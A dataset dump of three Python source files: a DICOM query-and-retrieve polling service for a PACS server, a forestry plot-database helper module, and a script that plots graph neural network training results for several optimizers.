+{"seq_id": "195472959", "text": "import os\r\nimport sys\r\nimport time\r\nimport socket\r\nimport random\r\n\r\nfrom pydicom.dataset import Dataset\r\n\r\nfrom pynetdicom import (AE, QueryRetrievePresentationContexts)\r\n\r\nfrom datetime import datetime\r\nfrom datetime import timedelta, date\r\n\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import Column, Integer, String, DateTime\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\nimport redis\r\n\r\nimport traceback\r\n\r\nAE_TITLE = 'SURESIDE'\r\nPEER_AE_TITLE = 'YOUR_DICOM_SERVER_AE_TITLE'\r\nPEER_IP_ADDRESS = 'YOUR_DICOM_SERVER_IP'\r\n\r\nPEER_PORT = 104\r\nCMOVE_AE_TITLE = 'SURESIDE'\r\n\r\nNODE_LIST = []\r\nNODE_LIST.append('localhost')\r\n\r\n### uncomment and edit following parts if clustering is needed\r\n#NODE_LIST.append('160.58.150.64')\r\n#NODE_LIST.append('160.8.12.233')\r\n#NODE_LIST.append('160.59.234.99')\r\n\r\nredis_client_list = []\r\nlocal_redis = None\r\n\r\nfor item in NODE_LIST:\r\n redisClient = redis.StrictRedis(host=item, port=6379, db=0)\r\n redis_client_list.append(redisClient)\r\n if item == 'localhost':\r\n local_redis = redisClient\r\n\r\nBase = declarative_base()\r\n\r\nclass Program_Error(Base):\r\n __tablename__ = 'program_error'\r\n \r\n Id = Column(Integer, autoincrement=True, primary_key=True)\r\n Record_Date_Time = Column(DateTime, nullable=False,default=datetime.now)\r\n Error_Detail = Column(String)\r\n\r\nengine = create_engine('postgresql://rad:rad@localhost:5432/rad_db')\r\n\r\nBase.metadata.create_all(bind=engine)\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\ndef c_find_pacs(date_of_query, time_of_query):\r\n # QueryRetrieveSOPClassList contains the SOP Classes supported\r\n # by the Query/Retrieve Service Class (see PS3.4 Annex C.6)\r\n #ae = AE(ae_title=my_title,scu_sop_class=QueryRetrieveSOPClassList)\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n\r\n # Try and associate with the peer AE\r\n # Returns the Association thread\r\n print('Requesting Association with the peer for C-FIND')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT), ae_title=PEER_AE_TITLE)\r\n\r\n result_list = []\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n # Creat a new DICOM dataset with the attributes to match against\r\n # In this case match any patient's name at the PATIENT query\r\n # level. See PS3.4 Annex C.6 for the complete list of possible\r\n # attributes and query levels.\r\n dataset = Dataset()\r\n dataset.ModalitiesInStudy = 'DX\\CR'\r\n dataset.AccessionNumber = ''\r\n dataset.StudyInstanceUID = ''\r\n #dataset.SeriesInstanceUID = ''\r\n #dataset.SOPInstanceUID = ''\r\n \r\n dataset.StudyDate = date_of_query\r\n dataset.StudyTime = time_of_query\r\n dataset.QueryRetrieveLevel = \"STUDY\"\r\n\r\n # Send a DIMSE C-FIND request to the peer\r\n # query_model is the Query/Retrieve Information Model to use\r\n # and is one of 'W', 'P', 'S', 'O'\r\n # 'W' - Modality Worklist (1.2.840.10008.5.1.4.31)\r\n # 'P' - Patient Root (1.2.840.10008.5.1.4.1.2.1.1)\r\n # 'S' - Study Root (1.2.840.10008.5.1.4.1.2.2.1)\r\n # 'O' - Patient/Study Only (1.2.840.10008.5.1.4.1.2.3.1)\r\n responses = assoc.send_c_find(dataset, query_model='S')\r\n \r\n for (status, dataset) in responses:\r\n print (str(status))\r\n #if 'Pending' in str(status):\r\n if dataset:\r\n if dataset.ModalitiesInStudy and dataset.AccessionNumber and dataset.StudyInstanceUID and dataset.StudyDate and dataset.StudyTime:\r\n print ('Modality:' +str(dataset.ModalitiesInStudy))\r\n print ('Accession Number:' +str(dataset.AccessionNumber))\r\n print ('Study Instance UID:' +str(dataset.StudyInstanceUID))\r\n print ('Study Date:' +str(dataset.StudyDate))\r\n print ('Study Time:' +str(dataset.StudyTime))\r\n #print ('Series Instance UID:' +str(dataset.SeriesInstanceUID))\r\n #print('SOP Instance UID:'+ str(dataset.SOPInstanceUID))\r\n \r\n \r\n result_list.append(dataset.StudyInstanceUID)\r\n \r\n #except Exception as e:\r\n #print('Exception: '+ str(e))\r\n #pass\r\n\r\n # Release the association\r\n assoc.release()\r\n return result_list\r\n\r\ndef c_find_pacs_series(study_uid):\r\n # QueryRetrieveSOPClassList contains the SOP Classes supported\r\n # by the Query/Retrieve Service Class (see PS3.4 Annex C.6)\r\n #ae = AE(ae_title=my_title,scu_sop_class=QueryRetrieveSOPClassList)\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n result_list = []\r\n\r\n # Try and associate with the peer AE\r\n # Returns the Association thread\r\n print('Requesting Association with the peer for C-FIND')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT), ae_title=PEER_AE_TITLE)\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n # Creat a new DICOM dataset with the attributes to match against\r\n # In this case match any patient's name at the PATIENT query\r\n # level. See PS3.4 Annex C.6 for the complete list of possible\r\n # attributes and query levels.\r\n dataset = Dataset()\r\n dataset.StudyInstanceUID = study_uid\r\n dataset.SeriesInstanceUID = ''\r\n #dataset.SOPInstanceUID = ''\r\n \r\n dataset.QueryRetrieveLevel = \"SERIES\"\r\n\r\n # Send a DIMSE C-FIND request to the peer\r\n # query_model is the Query/Retrieve Information Model to use\r\n # and is one of 'W', 'P', 'S', 'O'\r\n # 'W' - Modality Worklist (1.2.840.10008.5.1.4.31)\r\n # 'P' - Patient Root (1.2.840.10008.5.1.4.1.2.1.1)\r\n # 'S' - Study Root (1.2.840.10008.5.1.4.1.2.2.1)\r\n # 'O' - Patient/Study Only (1.2.840.10008.5.1.4.1.2.3.1)\r\n responses = assoc.send_c_find(dataset, query_model='S')\r\n \r\n for (status, dataset) in responses:\r\n #print (str(status))\r\n #if 'Pending' in str(status):\r\n if dataset:\r\n if dataset.SeriesInstanceUID:\r\n #print ('Series Instance UID:' +str(dataset.SeriesInstanceUID))\r\n #print('SOP Instance UID:'+ str(dataset.SOPInstanceUID))\r\n \r\n result_dict = {'study_uid': study_uid, 'series_uid': dataset.SeriesInstanceUID}\r\n result_list.append(result_dict)\r\n \r\n #except Exception as e:\r\n #print('Exception: '+ str(e))\r\n #pass\r\n\r\n # Release the association\r\n assoc.release()\r\n return result_list\r\n\r\ndef c_find_pacs_image(study_uid, series_uid):\r\n # QueryRetrieveSOPClassList contains the SOP Classes supported\r\n # by the Query/Retrieve Service Class (see PS3.4 Annex C.6)\r\n #ae = AE(ae_title=my_title,scu_sop_class=QueryRetrieveSOPClassList)\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n result_list = []\r\n\r\n # Try and associate with the peer AE\r\n # Returns the Association thread\r\n print('Requesting Association with the peer for C-FIND')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT), ae_title=PEER_AE_TITLE)\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n # Creat a new DICOM dataset with the attributes to match against\r\n # In this case match any patient's name at the PATIENT query\r\n # level. See PS3.4 Annex C.6 for the complete list of possible\r\n # attributes and query levels.\r\n dataset = Dataset()\r\n dataset.StudyInstanceUID = study_uid\r\n dataset.SeriesInstanceUID = series_uid\r\n dataset.SOPInstanceUID = ''\r\n \r\n dataset.QueryRetrieveLevel = \"IMAGE\"\r\n\r\n # Send a DIMSE C-FIND request to the peer\r\n # query_model is the Query/Retrieve Information Model to use\r\n # and is one of 'W', 'P', 'S', 'O'\r\n # 'W' - Modality Worklist (1.2.840.10008.5.1.4.31)\r\n # 'P' - Patient Root (1.2.840.10008.5.1.4.1.2.1.1)\r\n # 'S' - Study Root (1.2.840.10008.5.1.4.1.2.2.1)\r\n # 'O' - Patient/Study Only (1.2.840.10008.5.1.4.1.2.3.1)\r\n responses = assoc.send_c_find(dataset, query_model='S')\r\n \r\n for (status, dataset) in responses:\r\n #print (str(status))\r\n #if 'Pending' in str(status):\r\n if dataset:\r\n if dataset.SOPInstanceUID:\r\n #print('SOP Instance UID:'+ str(dataset.SOPInstanceUID))\r\n result_dict = {'study_uid': study_uid, 'series_uid': dataset.SeriesInstanceUID, 'img_uid':dataset.SOPInstanceUID}\r\n result_list.append(result_dict)\r\n \r\n #except Exception as e:\r\n #print('Exception: '+ str(e))\r\n #pass\r\n\r\n # Release the association\r\n assoc.release()\r\n return result_list\r\n\r\ndef c_move_pacs(study_uid, series_uid, img_uid):\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n print('Requesting Association with the peer for C-MOVE')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT),ae_title=PEER_AE_TITLE)\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n dataset = Dataset()\r\n dataset.StudyInstanceUID = study_uid\r\n dataset.SeriesInstanceUID = series_uid\r\n dataset.SOPInstanceUID = img_uid\r\n dataset.QueryRetrieveLevel = \"IMAGE\"\r\n \r\n \r\n responses = assoc.send_c_move(dataset, CMOVE_AE_TITLE,query_model='S')\r\n\r\n for (status, dataset) in responses:\r\n #print (str(status))\r\n pass\r\n \r\n # Release the association\r\n assoc.release()\r\n\r\ndef main():\r\n ##\r\n ## Main loop for C-Move.\r\n ## \r\n\r\n\r\n while True:\r\n try:\r\n now = datetime.now()\r\n print(now)\r\n fifteenth_min_before_time = now - timedelta(minutes=15)\r\n query_date = fifteenth_min_before_time.strftime(\"%Y%m%d\")\r\n query_time = fifteenth_min_before_time.strftime(\"%H%M%S\") + '-' + now.strftime(\"%H%M%S\")\r\n print(query_date)\r\n print(query_time)\r\n \r\n series_uid_list = []\r\n img_uid_list = []\r\n study_result = c_find_pacs(query_date, query_time)\r\n for item in study_result:\r\n series_result = c_find_pacs_series(item)\r\n series_uid_list.extend(series_result)\r\n for item in series_uid_list:\r\n img_result = c_find_pacs_image(item['study_uid'], item['series_uid'])\r\n img_uid_list.extend(img_result)\r\n \r\n \r\n for item in img_uid_list:\r\n image_exist_list = []\r\n for redis_client in redis_client_list:\r\n try:\r\n redis_exist =redis_client.sismember('instance_uid_set', str(item['img_uid']))\r\n image_exist_list.append(redis_exist)\r\n except:\r\n print('Redis connection error')\r\n pass\r\n print(image_exist_list)\r\n\r\n if any(image_exist_list):\r\n print(\"Skip cmove, SOP Instance UID exists in redis record!\")\r\n else:\r\n c_move_pacs(item['study_uid'], item['series_uid'], item['img_uid'])\r\n local_redis.sadd('instance_uid_set', str(item['img_uid']))\r\n \r\n # cmove_list = []\r\n \r\n # for key, value in cfind_result.items():\r\n # study_instance_uid = key\r\n # number_of_image = value\r\n # combined = study_instance_uid + '_' + number_of_image\r\n \r\n # study_exist_list = []\r\n \r\n # for item in session_list:\r\n # session = item['session']\r\n # exists_at_record = session.query(exists().where(CFIND_Study_UID.Study_UID == combined)).scalar()\r\n # study_exist_list.append(exists_at_record)\r\n # session.close()\r\n \r\n # if not any(study_exist_list):\r\n # cmove_list.append(study_instance_uid)\r\n \r\n # for item in cmove_list:\r\n # c_move_pacs(item)\r\n \r\n \r\n # for key, value in cfind_result.items():\r\n # study_instance_uid = key\r\n # number_of_image = value\r\n # combined = study_instance_uid + '_' + number_of_image\r\n # for item in session_list:\r\n # session =item['session']\r\n # if item['ip_address'] == 'localhost':\r\n # input_row = CFIND_Study_UID(Study_UID=combined)\r\n # session.add(input_row)\r\n # session.commit()\r\n except:\r\n print(traceback.format_exc())\r\n record = Program_Error(Error_Detail = traceback.format_exc())\r\n session.add(record)\r\n session.commit()\r\n pass\r\n sleep_time = random.randint(10, 60) \r\n time.sleep(sleep_time)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "DR_Warnings/server/c_move_server/c_move_service.py", "file_name": "c_move_service.py", "file_ext": "py", "file_size_in_byte": 13742, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "redis.StrictRedis", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 53, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 53, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 54, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 54, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 59, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 67, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 68, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 84, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 133, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 134, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 149, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 189, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 190, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 205, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 240, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 241, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 248, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 272, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 272, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 274, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 341, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 342, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 346, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 347, "usage_type": "call"}]}
+{"seq_id": "332749985", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport yaml\nimport pymssql\nimport sqlite3\n\nHERE = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.join(HERE))\n\n\"\"\"\npoptree_basis.py contains the classes for connecting to the databases and reference files\n\"\"\"\n\nclass YamlConn(object):\n \"\"\" This class connects to the YAML files containing the configuration to run the ptree program, including the database connection in the Config File and the Queries in the Query File.\n\n :Example:\n \n >>> A = YamlConn()\n >>> A.configfilename = \"config_2.yaml\"\n >>> A.config = \n >>> A.queries= \n >>> = A.sql_connect()\n\n .. warning:: pymssql dependency.\n\n METHODS\n\n \"\"\"\n def __init__(self):\n self.configfilename = os.path.join(HERE, \"config_2.yaml\")\n self.config = yaml.load(open(self.configfilename,'rb'))\n self.queries = yaml.load(open(os.path.join(HERE, self.config['query_file']), 'rb'))\n\n\n def sql_connect(self):\n \"\"\" Connects to the MS SQL server database\n\n Configuration parameters are in config_2.yaml file. \n \"\"\"\n sql_server = self.config['server']\n sql_user = self.config['user']\n sql_pw = self.config['password']\n sql_db = self.config['database']\n conn = pymssql.connect(server = sql_server, user=sql_user, password=sql_pw, database = sql_db)\n cur = conn.cursor()\n return conn, cur\n\n def lite3_connect(self):\n \"\"\" Connects to the SQLite3 database\n\n Configuration parameters are in config_2.yaml file. \n \"\"\"\n lite3conn = None\n\n lite3db = self.config['litedb']\n try:\n lite3conn = sqlite3.connect(lite3db)\n lite3cur = lite3conn.cursor()\n\n except sqlite3.Error as e:\n if lite3conn:\n lite3con.rollback()\n\n print(\"Error : \",e.args[0])\n sys.exit(1)\n return lite3conn, lite3cur\n\nclass DetailCapture(object):\n \"\"\" This class creates a dictionary for stands and plots to reference if a plot is a detail plot, when it is a detail plot, which stand it is in, and the minimum dbh from that plot, which is the threshold for it being included in the main inventory or not. \n\n The detail_reference dictionary is extended, which the expansion dictionary is condensed. This is mostly beacuse I''m not sure which will be the most useful yet. Call this dictionary ahead of calling anything from plots, trees, or stands to save big time. Otherwise there are so many queries\n\n :Example:\n >>> import poptree_basis\n >>> A.detail_reference.keys()\n >>> dict_keys(['AB08', 'AV14', 'AR07', 'RS01', 'TO11', 'AM16', 'AX15', 'RS29', 'RS02', 'RS30', 'RS28', 'TB13', 'RS32', 'AG05', 'TO04', 'AE10', 'RS31', 'PP17', 'AV06'])\n >>> A.detail_reference['AV14'].keys()\n >>> dict_keys([1984, 2000, 1990, 2008, 1978, 1995])\n >>> A.detail_reference['AV14'][1984].keys()\n >>> dict_keys([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16])\n >>> A.detail_reference['AV14'][1984][1]\n >>> {'detail': False, 'area': 625, 'min': 5.0}\n\n >>> A.umins_reference['HR02'][1984][1]\n >>> 5.0\n\n >>> A.uplot_areas['MH03'].keys()\n >>> dict_keys([1952, 1989, 1994, 1965, 1934, 1999, 1971, 2005, 1945, 1939, 1930, 1983])\n >>> A.uplot_areas['MH03'][1952].keys()\n >>> dict_keys([1])\n >>> A.uplot_areas['MH03'][1952][1]\n >>> 4047.0\n\n\n :A: is an instance of the detail_reference object, used for reference here.\n :A.detail_reference.[standid]: the stand, containing the years that stand \n :A.detail_reference.[standid][year]: the plots on that stand and year when at least 1 plot is detail\n :A.detail_reference.[standid][year][plotno]['detail']: Boolean True or False if a detail plot on that stand and plot and year\n :A.detail_reference.[standid][year][plotno]['area']: the area of that plot\n :A.detail_reference.[standid][year][plotno]['min']: the minimum dbh on that detail plot\n\n :A.umins_reference.[standid]: stands whose minimum dbhs in at least 1 year are not 15.\n :A.umins_reference.[standid][year]: the plots on that stand and year when at least 1 plot has a minimum dbh that is not 15\n :A.umins_reference[standid][year][plotno]: the minimum dbh for that stand, plot, and year, which is not 15.0\n\n :A.expansion[standid][year][plotid]: the expansion factor for the stand, year, and plot which will not be 1.0\n\n :A.uplots_areas[standid]: stands whose areas in at least 1 year are not 625 m2\n :A.uplots_areas[standid][year]: the plots on that stand and year when at least 1 plot has an area not 625 m2\n :A.uplots_areas[standid][year][plotno]: the area for the stand, year, and plot that is not 625\n\n \"\"\"\n def __init__(self):\n self.pconn, self.pcur = YamlConn().lite3_connect()\n self.detail_reference = {}\n self.expansion = {}\n self.uplot_areas = {}\n self.umins_reference = {}\n\n self.create_detail_reference()\n self.condense_detail_reference()\n self.contains_unusual_plots()\n self.create_unusual_mins_reference()\n\n def create_detail_reference(self):\n \"\"\" This function creates a lookup for detail plots that any tree or stand can use\n\n .. Example : \n >>> H = DetailCapture.detail_reference.keys()\n\n \"\"\"\n stands_with_details = []\n sql = YamlConn().queries['stand']['lite_context_dtl']\n self.pcur.execute(sql)\n \n for row in self.pcur:\n stands_with_details.append(str(row[0]))\n\n\n for each_stand in stands_with_details:\n\n if each_stand not in self.detail_reference:\n self.detail_reference[each_stand] = {}\n elif each_stand in self.detail_reference:\n pass\n\n sql = YamlConn().queries['stand']['lite_context_dtl_2'].format(standid=each_stand)\n self.pcur.execute(sql)\n \n for row in self.pcur:\n plotno = int(row[0])\n year = int(row[1])\n detail = str(row[2])\n \n # default area is 625\n try:\n area = int(row[3])\n except Exception:\n area = 625\n\n # default min dbh is 5\n try:\n mindbh = round(float(row[4]),1)\n except Exception:\n mindbh = 5.0\n\n if year not in self.detail_reference[each_stand] and detail == 'T':\n self.detail_reference[each_stand][year]={plotno:{'area': area, 'detail': True, 'min': mindbh}}\n elif year in self.detail_reference[each_stand] and detail == 'T':\n self.detail_reference[each_stand][year][plotno] = {'area': area, 'detail': True, 'min': mindbh}\n elif year not in self.detail_reference[each_stand] and detail != 'T':\n self.detail_reference[each_stand][year]={plotno:{'area':area, 'detail': False, 'min': mindbh}}\n elif year in self.detail_reference[each_stand] and detail !='T':\n self.detail_reference[each_stand][year][plotno] = {'area':area, 'detail':False, 'min':mindbh}\n\n else:\n pass\n\n def create_unusual_mins_reference(self):\n \"\"\" This function creates a lookup for plots that do not have minimums of 15, but are not detail plots.\n\n Queries the plot table for plots where detailPlot is not true and minimum DBH is not 15. \n :umins_reference: a lookup by stand, year, and plot for the minimum dbh of plots whose minimum dbh is not 15 and are not detail plots\n \"\"\"\n \n sql = YamlConn().queries['stand']['query_unusual_plot_minimums']\n self.pcur.execute(sql)\n \n for row in self.pcur:\n\n try:\n mindbh = round(float(row[3]),3)\n except Exception:\n mindbh = 5.0\n\n try:\n \n if str(row[0]) not in self.umins_reference:\n self.umins_reference[str(row[0])] = {int(row[2]) :{int(row[1]): mindbh}}\n\n elif str(row[0]) in self.umins_reference:\n if int(row[2]) not in self.umins_reference[str(row[0])]:\n self.umins_reference[str(row[0])][int(row[2])] = {int(row[1]) :mindbh}\n\n elif int(row[2]) in self.umins_reference[str(row[0])]:\n if int(row[1]) not in self.umins_reference[str(row[0])][int(row[2])]:\n self.umins_reference[str(row[0])][int(row[2])][int(row[1])] = mindbh\n else:\n print(\"some error has occurred in finding unusual minimums on not-detail plots\")\n except Exception as e17:\n pass\n\n def condense_detail_reference(self):\n \"\"\" Condenses the detail reference into a readable dictionary of expansion factors by plot\n\n\n Use the attribute of expansion to quickly look up the expansion factor, given a stand, year, and plot\n .. math : given tree attribute * (area of all plots / area of all detail plots) = scaled tree attribute\n\n .. math : 10 Mg Biomass in small trees on detail plots * (10000 m2 all plots / 2000 m2 detail plots) = 50 Mg Biomass on detail plots\n\n \"\"\"\n \n for each_stand in self.detail_reference.keys():\n for each_year in self.detail_reference[each_stand].keys():\n \n try:\n total_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys()])\n except Exception as e3:\n total_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys() if x != None])\n\n \n try:\n detail_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys() if self.detail_reference[each_stand][each_year][x]['detail'] is not False])\n except Exception as e3:\n detail_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys() if self.detail_reference[each_stand][each_year][x]['detail'] is not False and self.detail_reference[each_stand][each_year][x]['detail'] != None])\n\n try:\n expansion_factor_to_stand = round(float(total_area/detail_area),2)\n except Exception as e4:\n expansion_factor_to_stand = 1.\n\n if each_stand not in self.expansion:\n self.expansion[each_stand] = {each_year:expansion_factor_to_stand}\n elif each_stand in self.expansion:\n if each_year not in self.expansion[each_stand]:\n self.expansion[each_stand][each_year] = expansion_factor_to_stand\n else:\n pass\n\n def contains_unusual_plots(self):\n \"\"\" A lookup table for stands, plots, and years which have areas other than 625 m\n\n The query from 'query_unusual_plot' finds standid, plot, year, and area of all plots whose areas are not 625 m, in that order, and creates a nested look up to be passed to stand objects, so that only sql hits have to be performed when we can't assume 625.\n \"\"\"\n\n sql = YamlConn().queries['stand']['query_unusual_plot']\n self.pcur.execute(sql)\n \n for row in self.pcur:\n try: \n area = round(float(row[3]),2)\n except Exception as e8:\n area = None\n\n try:\n plot = int(row[2])\n except Exception:\n plot = None\n\n try:\n if str(row[0]) not in self.uplot_areas:\n self.uplot_areas[str(row[0])]={plot:{int(row[1]): area}}\n elif str(row[0]) in self.uplot_areas:\n if plot not in self.uplot_areas[str(row[0])]:\n self.uplot_areas[str(row[0])][plot] = {int(row[1]): area}\n elif plot in self.uplot_areas[str(row[0])]: \n self.uplot_areas[str(row[0])][plot].update({int(row[1]): area})\n except Exception as e9:\n pass", "sub_path": "poptree_basis.py", "file_name": "poptree_basis.py", "file_ext": "py", "file_size_in_byte": 12527, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 35, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pymssql.connect", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "366404999", "text": "import os\nimport argparse\nimport pickle\nimport matplotlib.pyplot as plt\nfrom graph_neural_network import GNN\n\nplt.rcParams['savefig.bbox'] = 'tight'\nplt.rcParams['savefig.transparent'] = True\n\n\ndef main(n_epochs, n_data, path_to_datasets, save_dir):\n os.makedirs(save_dir, exist_ok=True)\n optimizers = ['SGD', 'momentumSGD', 'Adam']\n results = get_results(n_data, n_epochs, optimizers)\n with open(f'{save_dir}/results.pickle', 'wb') as r:\n pickle.dump(results, r)\n for how in optimizers:\n plot_loss(results, how, save_dir)\n plot_accuracy(results, how, save_dir)\n for data_type in ['train', 'test']:\n plot_loss_compare(results, data_type, optimizers, save_dir)\n plot_accuracy_compare(results, data_type, optimizers, save_dir)\n\n\ndef get_results(n_data, n_epochs, optimizers):\n results = {}\n for how in optimizers:\n gnn = GNN()\n ids = list(range(n_data))\n gnn.train(ids, n_epochs=n_epochs, how=how)\n results[how] = {\n 'loss':\n {'train': gnn.avg_loss['train'],\n 'test': gnn.avg_loss['test']},\n 'accuracy':\n {'train': gnn.accuracy['train'],\n 'test': gnn.accuracy['test']}}\n return results\n\n\ndef plot_loss(results, how, save_dir):\n train_loss = results[how]['loss']['train']\n test_loss = results[how]['loss']['test']\n plt.figure(figsize=(6, 4))\n plt.plot(train_loss, label='train loss')\n plt.plot(test_loss, label='test loss')\n plt.xlim(0, len(train_loss) - 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('binary closs-entropy loss')\n plt.title(f'GNN binary closs-entropy loss ({how})')\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/loss_{how}.png\")\n\n\ndef plot_accuracy(results, how, save_dir):\n train_acc = results[how]['accuracy']['train']\n test_acc = results[how]['accuracy']['test']\n plt.figure(figsize=(6, 4))\n plt.plot(train_acc, label='train accuracy')\n plt.plot(test_acc, label='test accuracy')\n plt.xlim(0, len(train_acc) - 1)\n plt.ylim(0, 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('accuracy')\n plt.title(f'GNN accuracy ({how})')\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/accuracy_{how}.png\")\n\n\ndef plot_loss_compare(results, data_type, optimizers, save_dir):\n plt.figure(figsize=(6, 4))\n for how in optimizers:\n plt.plot(results[how]['loss'][data_type], label=how)\n plt.xlim(0, len(results[optimizers[0]]['loss'][data_type]) - 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('binary closs-entropy loss')\n plt.title(\n f\"GNN loss comparison among\\n{', '.join(optimizers)}\\n\"\n f\"(using {data_type} data)\")\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/loss_compare_{data_type}.png\")\n\n\ndef plot_accuracy_compare(results, data_type, optimizers, save_dir):\n plt.figure(figsize=(6, 4))\n for how in optimizers:\n plt.plot(results[how]['accuracy'][data_type], label=how)\n plt.xlim(0, len(results[optimizers[0]]['accuracy'][data_type]) - 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('accuracy')\n plt.title(\n f\"GNN accuracy comparison among\\n{', '.join(optimizers)}\\n\"\n f\"(using {data_type} data)\")\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/accuracy_compare_{data_type}.png\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-e', '--n_epochs', type=int, default=50,\n help='number of iterations over entire dataset')\n parser.add_argument(\n '-n', '--n_data', type=int, default=2000,\n help='number of data')\n parser.add_argument(\n '-p', '--path_to_datasets', default='datasets',\n help='path to datasets folder')\n parser.add_argument(\n '-s', '--save_dir', default='output',\n help='path to save figures')\n args = parser.parse_args()\n main(args.n_epochs, args.n_data, args.path_to_datasets, args.save_dir)\n", "sub_path": "other/pfn2019/src/plot_results.py", "file_name": "plot_results.py", "file_ext": "py", "file_size_in_byte": 4256, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 7, 